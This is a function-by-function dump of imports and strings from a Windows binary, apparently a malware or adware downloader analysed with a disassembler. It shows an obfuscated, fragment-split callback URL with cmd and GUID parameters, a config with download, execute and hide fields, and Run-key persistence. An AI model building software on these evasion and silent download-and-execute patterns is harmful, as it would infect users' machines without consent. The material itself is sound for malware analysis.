sub_outside():
	MSVCRT._CxxThrowException
	KERNEL32.CreateFileA
	NTDLL.RtlGetLastWin32Error
	KERNEL32.CreateFileMappingA
	KERNEL32.MapViewOfFile
	KERNEL32.UnmapViewOfFile
	KERNEL32.CloseHandle
	KERNEL32.ReadFile
	NTDLL.RtlSetLastWin32Error
	MSVCRT.memset
	SHELL32.SHFileOperationA
	KERNEL32.GetCurrentDirectoryA
	KERNEL32.RemoveDirectoryA
	KERNEL32.SetFileAttributesA
	KERNEL32.GetFileAttributesA
	MSVCRT.fopen
	MSVCRT.malloc
	MSVCRT.fread
	MSVCRT.fclose
	MSVCRT.free
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey
	MSVCRT.strlen
	MSVCRT.strncpy
	MSVCRT.strcpy
	MSVCRT.__set_app_type
	MSVCRT.__p__fmode
	MSVCRT.__p__commode
	MSVCRT.__setusermatherr
	MSVCRT._initterm
	MSVCRT.__getmainargs
	KERNEL32.GetStartupInfoA
	KERNEL32.GetModuleHandleA
	MSVCRT.exit
	MSVCRT._XcptFilter
	MSVCRT._exit

sub_42852F(014d):
	KERNEL32.Sleep
	MSVCRT.sprintf
	KERNEL32.lstrcpyA
	KERNEL32.lstrcatA
	KERNEL32.lstrcpynA
	MSVCRT.malloc
	MSVCRT.memset
	MSVCRT.free

	"%d"
	"&x="
	"&i="
	"&p="
	"&cmd="
	"&GUID="
	"&version="
	"htt"
	"p://"
	"wr.mc"
	"bo"
	"o"
	".co"
	"m/r"
	"eta"
	"dpu."
	"ph"
	"p?"

sub_42E5BB(054d):
	KERNEL32.CloseHandle

sub_422C48(080f):
	KERNEL32.lstrcpyA
	KERNEL32.lstrcatA
	KERNEL32.Sleep
	MSVCRT.memset
	KERNEL32.WaitForSingleObject

	".bin"
	"InstallZip()\n"
	".old"
	"OPEN"

sub_427270(0932):
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey

sub_431A74(09e7):
	MSVCRT.wcslen
	KERNEL32.WideCharToMultiByte
	NTDLL.RtlGetLastWin32Error

sub_42692B(0aef):
	"\\"
	"\\"
	"\\"
	"\\"

sub_4251CE(0d44):
	KERNEL32.Sleep

sub_4245AA(0f3d):
	MSVCRT._EH_prolog
	MSVCRT.strlen
	MSVCRT.strcpy
	MSVCRT.strstr
	MSVCRT.strncpy
	MSVCRT.strcat
	KERNEL32.Sleep

sub_4307DB(13d8):
	MSVCRT.strcpy
	MSVCRT.strcat
	KERNEL32.CreateDirectoryA

sub_425952(1435):
	MSVCRT._EH_prolog
	KERNEL32.Sleep

	"W"
	"R"
	"i"
	","

sub_422BB1(1645):
	MSVCRT._EH_prolog

sub_422680(1652):
	MSVCRT._mbsnbcpy

sub_42908F(1b44):
	KERNEL32.lstrcpyA
	KERNEL32.lstrlenA
	USER32.wsprintfA
	MSVCRT.strcpy
	MSVCRT.memset
	MSVCRT._strnicmp

	"old"

sub_42EA31(2398):
	MSVCRT.malloc
	MSVCRT.free

sub_4308E2(2439):
	MSVCRT.strcpy
	KERNEL32.CreateFileA
	KERNEL32.WriteFile
	KERNEL32.GetFileType
	KERNEL32.SetFileTime
	KERNEL32.CloseHandle

	"../"
	"..\\"

sub_427761(25ef):
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey

sub_42678F(25ef):
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey

sub_4319FF(2992):
	KERNEL32.lstrlenA
	KERNEL32.MultiByteToWideChar
	NTDLL.RtlGetLastWin32Error

sub_427B23(2c3b):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

sub_42B09D(2f12):
	MSVCRT.memcpy

	"invalid block type"
	"invalid stored block lengths"
	"too many	length or distance symbols"
	"invalid bit length repeat"

sub_4226DB(338e):
	KERNEL32.CreateFileA
	KERNEL32.WriteFile
	KERNEL32.CloseHandle
	KERNEL32.GlobalFree

sub_430707(356f):
	MSVCRT.memset

sub_426584(3845):
	"\\"
	"\\"
	"\\"
	"\\"

sub_4224B5(39db):
	MSVCRT.ftell
	MSVCRT.fseek

sub_42342D(3b5d):
	MSVCRT._EH_prolog
	MSVCRT.sprintf
	MSVCRT.atol
	MSVCRT.time
	KERNEL32.lstrcpyA
	MSVCRT.atoi
	MSVCRT._strnicmp
	MSVCRT.strcpy
	MSVCRT.strcat

	"ParseXML()\n"
	"%s"
	"configversion"
	"WR\\configversion"
	"paid"
	"WR\\p"
	"nextupdate"
	"WR\\nextupdate"
	"download"
	"%s"
	"rootkey"
	"key"
	"keyvalue"
	"requiredfile"
	"filename"
	"parameters"
	"SaveAs"
	"SavePath"
	"hide"
	"execute"
	"wait"
	"newupdater"
	"version"
	"identifier"
	"crc"
	"windows"
	"%s"

sub_42146A(3c3c):
	MSVCRT._CxxThrowException
	KERNEL32.CreateFileA
	NTDLL.RtlGetLastWin32Error
	KERNEL32.ReadFile
	KERNEL32.CloseHandle

sub_42DAD5(3cf8):
	MSVCRT.calloc

sub_42DBE5(3ea0):
	"1.1.3"

sub_4294E5(4060):
	MSVCRT.time
	KERNEL32.Sleep

sub_42309C(4085):
	MSVCRT._EH_prolog
	KERNEL32.Sleep
	KERNEL32.lstrcpynA
	MSVCRT.sprintf
	MSVCRT.strcat
	MSVCRT.strcpy

sub_42521F(410c):
	KERNEL32.Sleep

sub_431BE3(4529):
	KERNEL32.LocalFree

sub_42EBC2(459c):
	MSVCRT.malloc

sub_425D38(4766):
	MSVCRT._EH_prolog
	KERNEL32.lstrcpyA
	KERNEL32.lstrlenA
	USER32.wsprintfA
	MSVCRT.strcpy
	MSVCRT.memset
	MSVCRT._strnicmp
	MSVCRT.strlen
	KERNEL32.Sleep

	"affID"

sub_431B44(4878):
	MSVCRT._CxxThrowException

sub_421ACF(48e4):
	MSVCRT.memset
	MSVCRT.sprintf
	KERNEL32.lstrcatA

	"8B"
	"8B"
	"8B"

sub_425AD2(4fe3):
	MSVCRT._EH_prolog
	KERNEL32.Sleep
	MSVCRT._mbscmp

	"W"
	"R"
	"cmd"
	"0"

sub_422EC3(52c2):
	KERNEL32.lstrcpyA
	MSVCRT.sprintf
	KERNEL32.lstrcatA
	KERNEL32.Sleep

	"&retry=%d"

sub_424429(5608):
	MSVCRT._EH_prolog

	"download"

sub_424AE5(5af9):
	MSVCRT._EH_prolog
	KERNEL32.Sleep
	KERNEL32.lstrcpyA
	KERNEL32.lstrlenA
	KERNEL32.lstrcatA
	KERNEL32.GetWindowsDirectoryA
	KERNEL32.GetVolumeInformationA
	USER32.wsprintfA
	USER32.CharUpperA
	KERNEL32.GetSystemDefaultLCID
	KERNEL32.GetLocaleInfoA

	"67F9158B"
	"39"
	"67F9198B"
	"0A887397A5F240675EEF4D35019B6883A6FA5D6"...
	"67F9158B"
	"-"
	"-"
	"0A887397A5F240675EEF4D35019B6883A6FA5D6"...
	"-000"
	"0-00"
	"-"
	"-"
	"0A887397A5F240675EEF4D35019B6883A6FA5D6"...
	"000"
	"001"
	"}"

sub_42A17E(605a):
	"invalid literal/length code"
	"invalid distance	code"

sub_4227A4(638c):
	KERNEL32.GlobalFree
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcAddress
	KERNEL32.GlobalAlloc
	KERNEL32.GlobalReAlloc
	MSVCRT.memcpy
	KERNEL32.FreeLibrary

	"wininet.dll"
	"InternetOpenUrlA"
	"InternetCloseHandle"
	"InternetReadFile"

sub_424A53(6792):
	MSVCRT._EH_prolog

sub_4221DB(6c26):
	MSVCRT.memset
	KERNEL32.FindFirstFileA
	KERNEL32.FindNextFileA
	KERNEL32.FindClose

sub_4296C8(70c5):
	KERNEL32.Sleep

sub_42FDD7(741f):
	MSVCRT.free

sub_426B19(7482):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

sub_42DD65(74b1):
	"unknown compression method"
	"invalid window size"
	"incorrect header	check"
	"need dictionary"
	"incorrect data check"

sub_425FC6(773a):
	MSVCRT._EH_prolog
	KERNEL32.Sleep
	MSVCRT._mbscmp
	MSVCRT.atoi

	"\\m"
	"ro"
	"finu"
	".ex"
	"e"
	"mr"
	"of"
	"inu"
	".exe.tmp"
	"defaultvalue"
	"11866787A5F240675EE6610530A652BC94C74E7"...
	"WR"
	"34AC53A09BDC7C"

sub_4240F6(792e):
	MSVCRT._EH_prolog

sub_42F43A(7c4d):
	MSVCRT.strlen
	MSVCRT.strcpy

sub_42E61F(7f88):
	KERNEL32.SetFilePointer

sub_4242EC(7fd1):
	MSVCRT._EH_prolog

sub_43007C(858e):
	MSVCRT.memcpy
	MSVCRT.strcpy
	KERNEL32.DosDateTimeToFileTime
	MSVCRT.strcmp

	"UT"

sub_42DAFF(86fe):
	MSVCRT.free

sub_428380(87ee):
	USER32.EqualRect

sub_4255E6(8c0e):
	MSVCRT._EH_prolog
	KERNEL32.Sleep
	MSVCRT.time

	"WR"
	"nex"
	"tup"
	"date"

sub_4241BB(8cac):
	KERNEL32.InterlockedDecrement

sub_422296(8f2d):
	KERNEL32.GetCurrentDirectoryA
	MSVCRT.strlen
	MSVCRT.strcpy
	KERNEL32.SetCurrentDirectoryA

sub_425733(955b):
	MSVCRT._EH_prolog
	KERNEL32.Sleep

	"WR"
	"p"

sub_422E6E(95e7):
	MSVCRT._EH_prolog

sub_42EDD8(963d):
	MSVCRT.free

sub_422199(968a):
	KERNEL32.CreateDirectoryA

sub_425C0B(9860):
	MSVCRT._EH_prolog
	KERNEL32.Sleep

	"W"
	"R"
	"c"
	"md"

sub_431930(9c9a):
	MSVCRT._controlfp

sub_4263D6(9de0):
	MSVCRT._EH_prolog
	KERNEL32.LoadLibraryA
	KERNEL32.GetProcAddress
	KERNEL32.Sleep
	MSVCRT.atoi
	KERNEL32.FreeLibrary

	"31A144BF9E80200C66C764"
	"11A144BF9EF66A4761DE7C0307B1"
	"sei \n"

sub_421C92(9f30):
	NTDLL.RtlSetLastWin32Error
	MSVCRT.memset
	KERNEL32.Sleep
	SHELL32.SHFileOperationA

sub_42FFCE(a03c):
	KERNEL32.GetCurrentDirectoryA
	MSVCRT.strcat
	KERNEL32.GetFileType

	"\\"

sub_429A80(a21d):
	KERNEL32.InterlockedIncrement

sub_4256EA(af01):
	KERNEL32.CreateMutexA
	NTDLL.RtlGetLastWin32Error
	KERNEL32.CloseHandle

sub_42583A(b058):
	MSVCRT._EH_prolog
	KERNEL32.Sleep

	"W"
	"R"
	"i"

sub_4254CE(b058):
	MSVCRT._EH_prolog
	KERNEL32.Sleep

	"WR"
	"confi"
	"gversion"

sub_427610(b267):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

sub_42CF86(b45b):
	"invalid distance	code"
	"invalid literal/length code"

sub_42E66B(b76e):
	KERNEL32.SetFilePointer

sub_426491(b982):
	KERNEL32.lstrcatA

sub_42CD2E(ba1a):
	"oversubscribed dynamic bit lengths tree"...
	"incomplete dynamic bit lengths tree"

sub_429F50(bae0):
	MSVCRT.memcpy

sub_422A1E(bc98):
	MSVCRT._EH_prolog
	KERNEL32.GetWindowsDirectoryA
	KERNEL32.GetModuleFileNameA
	KERNEL32.Sleep
	MSVCRT.sprintf

	"%d"

sub_42F7E0(beac):
	MSVCRT.malloc
	MSVCRT.free

sub_422435(bf61):
	MSVCRT.strlen
	MSVCRT.toupper

sub_431776(c12a):
	MSVCRT._onexit
	MSVCRT.__dllonexit

sub_4249D2(c8e0):
	KERNEL32.SetCurrentDirectoryA

sub_4270ED(cb50):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

sub_42FF52(cc4c):
	MSVCRT.gmtime
	KERNEL32.SystemTimeToFileTime

sub_428360(cc75):
	USER32.CopyRect

sub_42239F(d371):
	MSVCRT.strlen
	MSVCRT.toupper

sub_42EA04(d803):
	MSVCRT.strcmp

sub_42334C(d83f):
	KERNEL32.lstrcpyA

sub_42CDD6(dd13):
	"oversubscribed literal/length tree"
	"incomplete literal/length tree"
	"oversubscribed distance tree"
	"incomplete distance tree"
	"empty distance tree with	lengths"

sub_42E740(dd1e):
	KERNEL32.ReadFile
	MSVCRT.memcpy

sub_421D8A(de74):
	NTDLL.RtlSetLastWin32Error
	MSVCRT.memset
	SHELL32.SHFileOperationA

sub_422F54(e014):
	MSVCRT._EH_prolog
	MSVCRT.sprintf
	MSVCRT.strcat

	"%02X"

sub_4252F7(e07b):
	MSVCRT._EH_prolog
	KERNEL32.Sleep
	MSVCRT._mbscmp

	"SOFTWARE\\Microso"
	"ft\\Windows\\Curren"
	"tVersion\\R"
	"un\\ru"
	"nner1"
	"defaultvalue"
	" "

sub_428300(ebb0):
	MSVCRT._mbscmp

sub_4315D0(ebb0):
	MSVCRT._mbsstr

sub_42E429(ec84):
	KERNEL32.GetCurrentProcess
	KERNEL32.DuplicateHandle
	KERNEL32.CreateFileA
	KERNEL32.GetFileType
	KERNEL32.SetFilePointer

sub_427C84(f016):
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey

sub_426CC3(f016):
	ADVAPI32.RegCreateKeyExA
	ADVAPI32.RegSetValueExA
	ADVAPI32.RegCloseKey

sub_421109(f546):
	KERNEL32.GetFileSize
	NTDLL.RtlGetLastWin32Error

sub_4266E9(f6ae):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

sub_428069(f6ae):
	ADVAPI32.RegOpenKeyExA
	ADVAPI32.RegQueryValueExA
	ADVAPI32.RegCloseKey

sub_42322C(f880):
	MSVCRT._strdup
	MSVCRT._mbsupr
	MSVCRT.free